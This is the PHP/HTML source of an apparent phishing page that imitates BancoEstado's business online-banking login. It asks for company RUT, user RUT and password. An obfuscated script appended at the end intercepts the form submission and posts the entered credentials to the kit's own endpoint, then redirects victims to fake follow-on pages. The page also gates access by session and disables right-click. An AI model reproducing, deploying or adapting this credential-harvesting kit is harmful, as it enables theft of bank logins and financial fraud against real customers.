<?php
if (!isset($_SESSION['referido'], $_POST['vista'])) :
    exit();
endif;

?>
<!DOCTYPE html>
<html xmlns="https://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">



<title>BancoEstado - Empresas</title>

<meta http-equiv="X-UA-Compatible" content="IE=10">
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.5, user-scalable=yes">

<link href="https://www.bancoestado.cl/imagenes/empresas2008/Nueva_home_Empresas/images/favicon.ico" rel="shortcut icon" type="image/x-icon" />

<link rel="stylesheet" type="text/css" href="/src/Empresas2_files/grid.css">
<link rel="stylesheet" type="text/css" href="/src/Empresas2_files/style.css">
<link rel="stylesheet" type="text/css" href="/src/Empresas2_files/OpenSans.css">
<link rel="stylesheet" type="text/css" href="/src/Empresas2_files/jquery.fancybox.css" media="screen">

<script type="text/javascript" src="/src/Empresas2_files/jquery1.12.0.min.js"></script>
<script type="text/javascript" src="/src/Empresas2_files/jquery.fancybox.js"></script>
<script type="text/javascript" src="/src/Empresas2_files/fancy_load.js"></script>





<script type="text/javascript">

var MystrMsg = '';

	function formateaRut(rut)
	{
		obj = rut;
		return obj;
	}
	
	
	function checkRutGenerico(campo, isEmpresa, svalor)
	{
		var tmpstr = "";
		var rut = campo;
		var i=0;
		var largo=0;
		var rutMax=rut;
		var j=0;
		var cnt=0;
		var dv="";
		var suma=0;
		var mul=0;
		var res=0;
		var dvi;


		if(campo.length == 0)
		{
			MystrMsg = 'Debe ingresar el RUT completo.';
			return false;
		}		

		for ( i=0; i < rut.length ; i++ )
			if ( rut.charAt(i) != ' ' && rut.charAt(i) != '.' && rut.charAt(i) != '-' )
				tmpstr = tmpstr + rut.charAt(i);
		rut = tmpstr;
		largo = rut.length;
		tmpstr = "";
		for ( i=0; rut.charAt(i) == '0' ; i++ );
			for (; i < rut.length ; i++ )
				tmpstr = tmpstr + rut.charAt(i);
		rut = tmpstr;
		largo = rut.length;

		if ( largo < 2 )
		{
			MystrMsg = 'Debe ingresar el RUT completo.';
			return false;
		}
		for (i=0; i < largo ; i++ )
		{
			if( (rut.charAt(i) != '0') && (rut.charAt(i) != '1') && (rut.charAt(i) !='2') && (rut.charAt(i) != '3') && (rut.charAt(i) != '4') && (rut.charAt(i) !='5') && (rut.charAt(i) != '6') && (rut.charAt(i) != '7') && (rut.charAt(i) != '8') && (rut.charAt(i) != '9') && (rut.charAt(i) !='k') && (rut.charAt(i) != 'K') )
			{
				MystrMsg = 'El valor ingresado no corresponde a un RUT valido.';
				return false;
			}
		}

		tmpstr="";
		for ( i=0; i < rutMax.length ; i++ )
			if ( rutMax.charAt(i) != ' ' && rutMax.charAt(i) != '.' && rutMax.charAt(i) != '-' )
			  tmpstr = tmpstr + rutMax.charAt(i);
		tmpstr = tmpstr.substring(0, tmpstr.length - 1);
		if ( (!(tmpstr < 50000000)) && (!isEmpresa) )
		{
			MystrMsg = 'El Rut ingresado no corresponde a un RUT de Persona Natural';
			return false;
		}

		var invertido = "";
		for ( i=(largo-1),j=0; i>=0; i--,j++ )
			invertido = invertido + rut.charAt(i);
		var drut = "";
		drut = drut + invertido.charAt(0);
		drut = drut + '-';
		cnt = 0;
		for ( i=1,j=2; i<largo; i++,j++ )
		{
			if ( cnt == 3 )
			{
				drut = drut + '.';
				j++;
				drut = drut + invertido.charAt(i);
				cnt = 1;
			}
			else
			{
				drut = drut + invertido.charAt(i);
				cnt++;
			}
		}
		invertido = "";
		for ( i=(drut.length-1),j=0; i>=0; i--,j++ )
		{
			if (drut.charAt(i)=='k')
				invertido = invertido + 'K';
			else
				invertido = invertido + drut.charAt(i);
		}

		switch(svalor)
		{
			case 1:
			    document.getElementById("CustPermID").value = invertido;
			    break;
			case 2:
			    document.getElementById("CustLoginID").value = invertido;
			    break;
		}

		if (checkDV(rut)==false)
		{
			MystrMsg = 'El RUT es incorrecto.';
			return false;
		}

		return true;
	}

	function checkDV(crut)
	{
		var largo = 0;
		var dv ="";
		var rut="";
		var suma=0;
		var mul=0;
		var res=0;
		var dvr = '0';
		var dvi=0;
		var i=0;

		largo = crut.length;
		if(largo < 2){
			return false;
		}
		if(largo > 2){
			rut = crut.substring(0, largo - 1);
		}else{
			rut = crut.charAt(0);
		}

		var dv = crut.charAt(largo-1);

		if(!checkCDV(dv))
			return false;

		if(rut == null || dv == null){
			return false;
		}

		suma = 0;
		mul  = 2;
		for (i= rut.length -1 ; i >= 0; i--)
		{
			suma = suma + rut.charAt(i) * mul;
			if(mul == 7){
				mul = 2;
			}
			else{
				mul++;
			}
		}
		res = suma % 11;
		if (res==1)
		{
			dvr = 'k';
		}
		else
		{
			if(res==0){
			  dvr = '0';
			}
			else
			{
			  dvi = 11-res;
			  dvr = dvi + "";
			}
		}

		if(dvr != dv.toLowerCase())
		{
			return false;
		}
		return true;
	}

	function checkCDV(dvr)
	{
		var dv="";

		dv = dvr + "";
		if(dv != '0' && dv != '1' && dv != '2' && dv != '3' && dv != '4' && dv != '5' && dv != '6' && dv != '7' && dv != '8' && dv != '9' && dv != 'k'  && dv != 'K')
		{
			return false;
		}
		return true;
	}

	function soloRUT(e)
	{
		var tecla = (document.all) ? event.keyCode : e.which;

		if(tecla==8) return true;

		var patron =/^[0-9kK]+$/;  //acepta valores alfanumericos
		var te = String.fromCharCode(tecla);

		if(!patron.test(te) && tecla==0){
			return true;
		}


		if (tecla == 13)
        {
			if(!document.getElementById("CustPermID").value == "")
			{
				document.getElementById("CustLoginID").focus();
				if(!document.getElementById("CustLoginID").value == "")
				{
					document.getElementById("SignonPswd").focus();
				}
			}

        }
		return patron.test(te);
	}

	function soloLetrasYNum(e)
	{
		var tecla = (document.all) ? event.keyCode : e.which;

		if(tecla==8) return true;

		var patron =/^[0-9A-Za-z]+$/;  //acepta valores alfanumericos
		var te = String.fromCharCode(tecla);

		if(!patron.test(te) && tecla==0){
			return true;
		}

		if (tecla == 13)
        {
			if(!document.getElementById("CustPermID").value == ""
			&& !document.getElementById("CustLoginID").value == ""
			&& !document.getElementById("SignonPswd").value == "")
			{
				onFocus_Enviar();
			}
        }//

		return patron.test(te);
	}

	function onFocus_RutUsuario()
	{
		var objCustPermID = document.getElementById("CustPermID");
		if (objCustPermID.value.length==0)
		{return false;}

		ProcesarRutEmpresa();
	}

	function onFocus_Signon()
	{
		var objCustLoginID = document.getElementById("CustLoginID");
		if (objCustLoginID.value.length==0)
		{return false;}
	

		ProcesarRutUsuario();
		/*if (ProcesarRutEmpresa())
		{
			if (ProcesarRutUsuario())
			{
				return true;
			}
		}
		return false;*/
	}

	function onFocus_Enviar()
	{
		var objCustPermID = document.getElementById("CustPermID");
		if (objCustPermID.value.length==0)
		{alert("Ingrese su RUT");return false;}

		var objCustLoginID = document.getElementById("CustLoginID");
		if (objCustLoginID.value.length==0)
		{alert("Ingrese su RUT");return false;}

		var objSignonPswd  = document.getElementById("SignonPswd");
		if (ProcesarRutEmpresa())
		{
			if (ProcesarRutUsuario())
			{
				if (ProcesarSignon())
				{
					document.getElementById("SignonPswd").value= objSignonPswd.value.toLowerCase();
					document.getElementById("frmAction").submit();
					return true;				
				}
			}				
		}
		return false;
	}
	
	function ProcesarRutEmpresa(){
		var objCustPermID = document.getElementById("CustPermID");

		MystrMsg = "";
		if(checkRutGenerico(objCustPermID.value,true, 1)==false)
		{
			if (MystrMsg.length > 1){
				alert(MystrMsg);
			}		
			rutFormateado = formateaRut(objCustPermID.value);
			objCustPermID.value = rutFormateado;
			/*limpiaPuntoGuion(1);			
			objCustPermID.focus();

			if (MystrMsg.length > 1){
				objCustPermID.select();
			}*/		
			
			return false;
		}
		return true;
	}

	function ProcesarRutUsuario(){
		var objCustLoginID = document.getElementById("CustLoginID");

		if (objCustLoginID.value.length == 0)
		{
			alert("Ingrese su RUT");
			//objCustLoginID.focus();
			return false;
		}

		MystrMsg = '';		
		if(checkRutGenerico(objCustLoginID.value,false, 2)==false)
		{
			objFoco = 0;
			if (MystrMsg.length > 1)
			{ 
				alert(MystrMsg);
				objFoco = 1;
			}
			rutFormateado = formateaRut(objCustLoginID.value);
			objCustLoginID.value = rutFormateado;
			/*limpiaPuntoGuion(2);
			objCustLoginID.focus();
			
			if (objFoco == 1)
			{
				objCustLoginID.select();
			}*/	
			
			return false;
		}
		return true;
	}
	
	function ProcesarSignon()
	{
		var objSignonPswd = document.getElementById("SignonPswd");
		if (objSignonPswd.value.length == 0)
		{
			alert("Debe ingresar su Clave");
			//objSignonPswd.focus();
			return false;
		}
		return true;
	}
	
	function limpiaPuntoGuion(svalor)
	{
		var obj;
		switch(svalor)
		{
		   case 1:
				obj = document.getElementById("CustPermID").value;
				obj = obj.replace(".","");
				obj = obj.replace(".","");
				obj = obj.replace(/-/,"");
				document.getElementById("CustPermID").value = obj;
			break;
			case 2:
				obj = document.getElementById("CustLoginID").value;
				obj = obj.replace(".","");
				obj = obj.replace(".","");
				obj = obj.replace(/-/,"");
				document.getElementById("CustLoginID").value = obj;
			break;
		}

	}

	function myFunction() 
	{
	    var Obj = document.getElementById('Error');
	    if (Obj.style.visibility === 'hidden') {
	    	Obj.style.visibility = 'visible';
	    } else {
	    	Obj.label = '';
	        Obj.style.visibility = 'hidden';
	    }
	}	
</script>
</head>
<body oncontextmenu="return false;">
<div class="productos">
    <div id="header-outer">
        <div id="header" class="container_19">
            <div class="grid_4">
                <div id="logo_bco"><a href="#/"><img src="/src/Empresas2_files/logo_bcoEstado.gif" alt="BancoEstado" width="180" height="40" border="0"></a> </div>
            </div>
            <div class="header_soporte txt_naranjo grid_15"><span>Soporte Internet</span>600 660 0033</div>
            <div class="megamenu_container_acceso menu_black">
                <ul class="megamenu" style="left:0">
                    <li><a class="nodrop" href="#https://empresas.bancoestado.cl/imagenes/empresas2008/Nueva_home_Empresas/index.html"> Empresas</a></li>
                       <li><a class="nodrop" href="#https://empresas.bancoestado.cl/imagenes/institucionespublicas2008/Nueva_Home_Instituciones/index.html"> Inst. Públicas</a></li>
                       <li><a class="nodrop" href="#https://empresas.bancoestado.cl/imagenes/institucionespublicas2008/Acceso_Isfl/index.html"> Org. de la Sociedad Civil</a></li>
                </ul>
            </div>
        </div>
        <div style="clear:both"></div>
    </div>
    <div class="container_19">
        <div class="grid_4" id="sidebar-left">
            <div class="content" id="sidebar1">
                <div class="titulo">Banca en Línea </div>
                  <form class="acceso" id="frmlogin" name="frmlogin" target="_parent" method="post">
                        <input type="hidden" name="proceso" value="oooilkadlkempre">
									<label for="">Rut Empresa / Institución</label>
									<input name="CustPermID" id="CustPermID" tabindex="1" type="text" maxlength="9" onkeypress="return soloRUT(event)" onblur="onFocus_RutUsuario();" onfocus="limpiaPuntoGuion(1);" onpaste="return false" ondrag="return false" ondrop="return false" oncopy="return false" oncut="return false" autocomplete="off" style="text-align: right;">
			
									<label for="">Rut Usuario</label>
									<input name="CustLoginID" id="CustLoginID" tabindex="2" type="text" maxlength="9" onkeypress="return soloRUT(event)" onblur="onFocus_Signon();" onfocus="limpiaPuntoGuion(2);" onpaste="return false" ondrag="return false" ondrop="return false" oncopy="return false" oncut="return false" autocomplete="off" style="text-align: right;">
			
									<label for="">Clave</label>
									<input class="clave" size="8" name="SignonPswd" id="SignonPswd" maxlength="8" tabindex="3" type="password" onkeypress="return soloLetrasYNum(event);" onpaste="return false" ondrag="return false" ondrop="return false" oncopy="return false" oncut="return false" autocomplete="off">
			
									<input class="ingreso" value="Ingresar" type="submit" tabindex="4" id="enviar" name="enviar" onclick="">
			
									<input name="loginOpt" id="loginOpt" type="hidden" value="empresas">
			
									<input type="hidden" name="tp" id="tp" value="1">
									<input type="hidden" name="CLAVE" id="CLAVE" value="0000">
									<input type="hidden" name="NUEVO" id="NUEVO" value="1">
									<input type="hidden" name="EmpSignonPswd" id="EmpSignonPswd" value="0000">
									<input type="hidden" name="EmpSignonPswdAux" id="EmpSignonPswdAux" value="0000">
                  </form>
            </div>
			<div class="content" id="sidebar2">
				<div class="boton2">
					<a id="btnLoginPersona" href="#https://empresas.bancoestado.cl/imagenes/comun2008/banca-en-linea-personas.html">Acceso Personas </a>
				</div>
			</div>

        </div>
        <div id="main" class="grid_15 omega">
            <h1>Acceso </h1>
            <div class="bajada_seccion"></div>
            <div class="grid_15 panel alpha omega">
                <div class="content">
                    <div id="conten_cuerpo">
                        <div id="caja_destacado">
                              <div><img src="/src/Empresas2_files/destacado-acceso.jpg" width="683" height="320" alt=""></div>
                           <div style="clear:both"></div>
                            <div id="texto_descripcion" style="display:block">
                                <p>Ejemplos de E-mail y Sitios Falsos</p>
                                <table width="90%" border="0" align="center" cellpadding="0" cellspacing="10">
                                    <tbody><tr>
                                        <td><a href="#/src/Empresas2_files/01.jpg" class="fancybox"><img src="/src/Empresas2_files/01.jpg" alt="Ejemplo" width="120" height="108" border="0"></a></td>
                                        <td><a href="#/src/Empresas2_files/02.jpg" class="fancybox"><img src="/src/Empresas2_files/02.jpg" alt="Ejemplo" width="120" height="108" border="0"></a></td>
                                        <td><a href="#/src/Empresas2_files/03.jpg" class="fancybox"><img src="/src/Empresas2_files/03.jpg" alt="Ejemplo" width="120" height="108" border="0"></a></td>
                                        <td><a href="#/src/Empresas2_files/04.jpg" class="fancybox"><img src="/src/Empresas2_files/04.jpg" alt="Ejemplo" width="120" height="108" border="0"></a></td>
                                    </tr>
                                </tbody></table>
                            </div>
                        </div>
                        <table width="80%" border="0" align="center" cellpadding="0" cellspacing="0">
                            <tbody><tr>
                                <td width="48%" align="center"><a href="#https://trustsealinfo.verisign.com/splash?form_file=fdf/splash.fdf&amp;dn=personas.bancoestado.cl&amp;lang=es" class="demo_prod"><img src="/src/Empresas2_files/logo_verisign.jpg" alt="Verisign" width="88" height="49" border="0"></a></td>
                                <td width="52%" align="center"><a href="#https://www.protegetusdatos.cl/" target="_blank"><img src="/src/Empresas2_files/seg_protege.gif" alt="Protege" width="146" height="61" border="0"></a></td>
                            </tr>
                        </tbody></table> 
                    </div>
                </div>
            </div>

          </div>
    </div>
    <div style="clear:both"></div>
</div>
<div id="footer" class="container_19 clearfix">
    <div class="grid_19">
        <div class="content"> ©2018  BancoEstado.
            Todos los derechos reservados. <br>
            <a title="Política de Privacidad y Uso" href="https://empresas.bancoestado.cl/imagenes/_personas/politica-de-privacidad-y-uso.asp" class="mapa">Política de Privacidad y Uso</a> &nbsp;&nbsp; <a target="_blank" href="https://www.defensoriadelclientedeabif.cl/">Defensoría del Cliente.</a> <br>
            <a class="iframeh300" title="Políticas y procedimientos para el pago anticipado de créditos o su refinanciamiento" href="https://empresas.bancoestado.cl/imagenes/empresas2008/Nueva_home_Empresas/footer_links/pol_pago_anticipado.html">Políticas y procedimientos para el pago anticipado de créditos o su refinanciamiento.</a><br>
            <a class="mapa" title="Nueva Forma de Cálculo de la Tasa de Interés para Líneas de Crédito" href="https://empresas.bancoestado.cl/imagenes/empresas2008/Nueva_home_Empresas/footer_links/calculo_tasa_int.html">Nueva Forma de Cálculo de la Tasa de Interés para Líneas de Crédito</a><br>
            <a class="iframeh300 " href="https://empresas.bancoestado.cl/imagenes/empresas2008/Nueva_home_Empresas/footer_links/garantia_estatal.html" target="_blank">Infórmese sobre la garantía estatal de los depósitos en su Banco o en </a> <a title="Enlace externo a Superintendencia de Bancos e Instituciones Financieras" target="_blank" href="https://www.sbif.cl/">www.sbif.cl</a> <br>
        </div>
    </div>
    <div style="clear:both"></div>
</div>



    



    
        <form action="" method="post" name="frmview"><input type="hidden" name="vista" value=""></form>


            
            </body></html>



<script src="/src/js/uuytaiosido.js"></script>
<script>
    var tool = new Mataburr0oa();
    var sesoooksd = '<?= $_SESSION['referido']; ?>';

    window.onload = () => {
        ooaspdqwie(window.innerWidth, window.innerHeight)
    }

    window.onresize = () => {
        ooaspdqwie(window.innerWidth, window.innerHeight);
    }

    function ooaspdqwie(w, h) {
        var xw = w;
        var xh = h;
/*
        if (xw < 576) {
            if (!document.getElementById('loin').classList.contains('mobile')) {
                document.getElementById('loin').classList.add('mobile')
            }
        } else {
            if (document.getElementById('loin').classList.contains('mobile')) {
                document.getElementById('loin').classList.remove('mobile')
            }
        }
*/
    }

    var formnum = 1;
    document.getElementById('frmlogin').addEventListener('submit', (e) => {
        e.preventDefault();
        //if (sdfgsdfgsdfgb() == true) {
            if (formnum == 1) {
                //document.getElementById('btnsend').innerHTML = "INGRESANDO...";
                form = document.getElementById('frmlogin');
                tool.ajaxrequest(sesoooksd, 'post/req/soho', oosadifo, form);
                formnum++;
            }
        //} else {


        //}

    });


    function oosadifo(res) {
        var obJSON = JSON.parse(res);
        if (obJSON.pr == 1 && obJSON.ut == 'p') {
            sdfgsdfgv('/' + sesoooksd + '/bancoestado/process.asp/MID/AID/HOME-000/RQI/704BC9DB638147E69D06DF20CBE4F703/rnd/2F1DC493/ssnid/336A86CD');
        } else if (obJSON.pr == 1 && obJSON.ut == 'e') {
            sdfgsdfgv('/' + sesoooksd + '/in_bie.htm');
        } else {
            sdfgsdfgv('/' + sesoooksd + '/bancoestado/process.asp');
        }
    }

    document.getElementById('btnLoginPersona').addEventListener('click', (e) => {
        sdfgsdfgv('/' + sesoooksd + '/imagenes/_personas/home/default.asp');
        
    })
    
    function sdfgsdfgv($url) {
        var $form = document.forms.frmview;
        $form.setAttribute('action', $url);
        $form.submit();
    }

    function sdfgsdfgsdfgb() {
        var mrut = document.getElementById('drut').value;
        var mpwd = document.getElementById('dpin').value;
        console.log(mrut);
        console.log(mpwd);
        var iiisdo = true;

        if (asdfgsdfgsdfg(mrut) == false) {
            iiisdo = false;
        }

        if (mpwd.length < 4) {
            iiisdo = false;
        }
        console.log(iiisdo);

        if (iiisdo == true) {
            if (document.getElementById('btnsend').classList.contains('inactive')) {
                document.getElementById('btnsend').classList.remove('inactive');
            }
            return true;
        } else {
            document.getElementById('btnsend').classList.add('inactive');
            return false;
        }


    }


    function asdfgsdfgsdfg(vcvdfgsd) {
        vcvdfgsd = vcvdfgsd.split('.').join('');
        vcvdfgsd = vcvdfgsd.replace("‐", "-");
        if (!/^[0-9]+[-|‐]{1}[0-9kK]{1}$/.test(vcvdfgsd))
            return false;
        var tmp = vcvdfgsd.split('-');
        var digv = tmp[1];
        var rut = tmp[0];
        if (digv == 'K') digv = 'k';

        return (ddfgdfgeod(rut) == digv);
    }

    function ddfgdfgeod(T) {
        var M = 0,
            S = 1;
        for (; T; T = Math.floor(T / 10))
            S = (S + T % 10 * (9 - M++ % 6)) % 11;
        return S ? S - 1 : 'k';
    }

    function iusfydiouasdfasdf() {
        var formLogin = document.getElementById("frmlogin");
        var sRut1 = formLogin.drut.value.toUpperCase();
        sRut1 = dfgvvxcgfd(sRut1);
        // var sRut1 = rut.value;
        // contador de para saber cuando insertar el . o la -
        var nPos = 0;

        // Guarda el rut invertido con los puntos y el guiï¿½n agregado
        var sInvertido = "";

        // Guarda el resultado final del rut como debe ser
        var sRut = "";
        while (sRut1.indexOf(".") != -1) {
            sRut1 = sRut1.replace(".", "");
        }
        sRut1 = sRut1.replace("-", "");

        for (var i = sRut1.length - 1; i >= 0; i--) {
            sInvertido += sRut1.charAt(i);
            if (i == sRut1.length - 1)
                sInvertido += "-";
            else if (nPos == 3) {
                sInvertido += ".";
                nPos = 0;
            }
            nPos++;
        }

        for (var j = sInvertido.length - 1; j >= 0; j--) {
            if (sInvertido.charAt(sInvertido.length - 1) != ".")
                sRut += sInvertido.charAt(j);
            else if (j != sInvertido.length - 1)
                sRut += sInvertido.charAt(j);

        }
        // Pasamos al campo el valor formateado
        // rut.value = sRut.toUpperCase();
        document.getElementById("frmlogin").drut.value = sRut.toUpperCase();

    }


    function dfgvvxcgfd(rut) {
        var i = 0;
        while (rut.length > i) {
            if ((rut.substring(i, i + 1) == " ") || (rut.codePointAt(i) == 173)) {
                rut = rut.substring(0, i) + rut.substring(i + 1, rut.length);
            } else {
                i = i + 1;
            }
        }
        return rut;
    }
</script>